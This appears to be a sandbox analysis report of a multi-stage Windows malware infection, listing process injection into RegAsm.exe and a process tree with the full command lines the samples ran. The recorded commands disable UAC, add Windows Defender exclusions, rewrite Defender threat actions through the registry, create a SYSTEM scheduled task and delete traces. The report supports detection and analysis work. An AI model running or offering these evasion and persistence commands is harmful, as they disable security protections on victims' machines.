Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\1000004002\0869e0ea89.exe N/A
N/A N/A C:\Users\Admin\Pictures\iR1RDwYXPTmcKLiz2pyjsa5N.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\iR1RDwYXPTmcKLiz2pyjsa5N.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 224 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 224 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 224 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 1984 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 1984 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 1984 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 1984 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\1000004002\0869e0ea89.exe
PID 1984 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\1000004002\0869e0ea89.exe
PID 1984 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\1000004002\0869e0ea89.exe
PID 1392 wrote to memory of 4308 N/A C:\Users\Admin\1000004002\0869e0ea89.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 1392 wrote to memory of 4308 N/A C:\Users\Admin\1000004002\0869e0ea89.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 1392 wrote to memory of 4308 N/A C:\Users\Admin\1000004002\0869e0ea89.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 1984 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe
PID 1984 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe
PID 1984 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe
PID 4308 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
PID 4308 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
PID 4308 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
PID 224 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4308 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
PID 4308 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
PID 4308 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
PID 2248 wrote to memory of 4264 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 2248 wrote to memory of 4264 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 2248 wrote to memory of 4264 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 2248 wrote to memory of 3572 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
PID 2248 wrote to memory of 3572 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
PID 4308 wrote to memory of 5256 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
PID 4308 wrote to memory of 5256 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
PID 4308 wrote to memory of 5256 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
PID 5256 wrote to memory of 5376 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5256 wrote to memory of 5376 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5256 wrote to memory of 5376 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5256 wrote to memory of 5376 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5256 wrote to memory of 5376 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5256 wrote to memory of 5376 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5256 wrote to memory of 5376 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5256 wrote to memory of 5376 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5256 wrote to memory of 5376 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4308 wrote to memory of 5524 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 4308 wrote to memory of 5524 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 4308 wrote to memory of 5524 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 5524 wrote to memory of 5568 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5524 wrote to memory of 5568 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5524 wrote to memory of 5568 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5524 wrote to memory of 5568 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5524 wrote to memory of 5568 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5524 wrote to memory of 5568 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5524 wrote to memory of 5568 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5524 wrote to memory of 5568 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5524 wrote to memory of 5568 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe

"C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe"

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4744,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=1040 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"

C:\Users\Admin\1000004002\0869e0ea89.exe

"C:\Users\Admin\1000004002\0869e0ea89.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"

C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe

"C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe"

C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe

"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe

"C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"

C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe

"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe

"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 224 -ip 224

C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe

"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 224 -s 296

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5524 -ip 5524

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5524 -s 260

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Users\Admin\Pictures\79AxFRg8VecFbI3ZhvCwd6kV.exe

"C:\Users\Admin\Pictures\79AxFRg8VecFbI3ZhvCwd6kV.exe"

C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe

"C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe" /s

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\Pictures\iR1RDwYXPTmcKLiz2pyjsa5N.exe

"C:\Users\Admin\Pictures\iR1RDwYXPTmcKLiz2pyjsa5N.exe"

C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe

"C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Users\Admin\Pictures\1sV0V74o6XuxHDx0lr3ZwrZy.exe

"C:\Users\Admin\Pictures\1sV0V74o6XuxHDx0lr3ZwrZy.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Users\Admin\AppData\Local\Temp\7zSE9DE.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe

.\Install.exe /NQHxdidUQs "385118" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bqGGCwwWIommTRgeuN" /SC once /ST 02:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe\" 1g /IuhdidLfUU 385118 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqGGCwwWIommTRgeuN"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bqGGCwwWIommTRgeuN

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bqGGCwwWIommTRgeuN

C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe 1g /IuhdidLfUU 385118 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

